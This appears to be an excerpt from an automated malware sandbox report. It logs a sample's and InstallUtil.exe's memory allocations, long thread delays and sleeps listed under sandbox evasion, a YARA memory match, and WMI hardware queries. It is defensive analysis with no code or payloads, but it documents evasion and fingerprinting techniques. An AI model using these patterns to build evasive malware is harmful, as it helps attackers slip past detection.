                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: Yara matchFile source: Process Memory Space: umVoLahqZn.exe PID: 5812, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory allocated: 1530000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory allocated: 33E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory allocated: 3130000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory allocated: 86F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory allocated: 96F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory allocated: 98B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory allocated: A8B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory allocated: AC40000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory allocated: BC40000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeMemory allocated: CC40000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1900000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3380000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1960000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599327Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599094Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598766Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598328Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598219Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598094Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597766Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597328Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597219Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597109Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596891Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596766Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596641Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596531Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596312Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596203Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596094Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595766Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595641Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595516Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595406Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595297Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595187Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595078Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594966Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594859Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594750Jump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeWindow / User API: threadDelayed 7872Jump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeWindow / User API: threadDelayed 1952Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1435Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8420Jump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exe TID: 6200Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exe TID: 6200Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3924Thread sleep count: 1435 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep count: 35 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -600000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -599875s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -599766s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3924Thread sleep count: 8420 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -599656s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -599547s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -599437s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -599327s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -599219s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -599094s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -598984s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -598875s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -598766s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -598656s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -598547s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -598437s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -598328s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -598219s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -598094s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -597984s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -597875s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -597766s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -597656s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -597547s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -597437s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -597328s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -597219s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -597109s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -597000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -596891s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -596766s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -596641s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -596531s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -596422s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -596312s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -596203s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -596094s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -595984s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -595875s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -595766s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -595641s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -595516s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -595406s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -595297s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -595187s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -595078s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -594966s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -594859s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5024Thread sleep time: -594750s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\umVoLahqZn.exeThread delayed: delay time: 30000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599327Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599094Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598766Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598328Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598219Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598094Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597766Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597656Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597328Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597219Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597109Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596891Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596766Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596641Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596531Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596422Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596312Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596203Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596094Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595984Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595766Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595641Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595516Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595406Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595297Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595187Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595078Jump to behavior
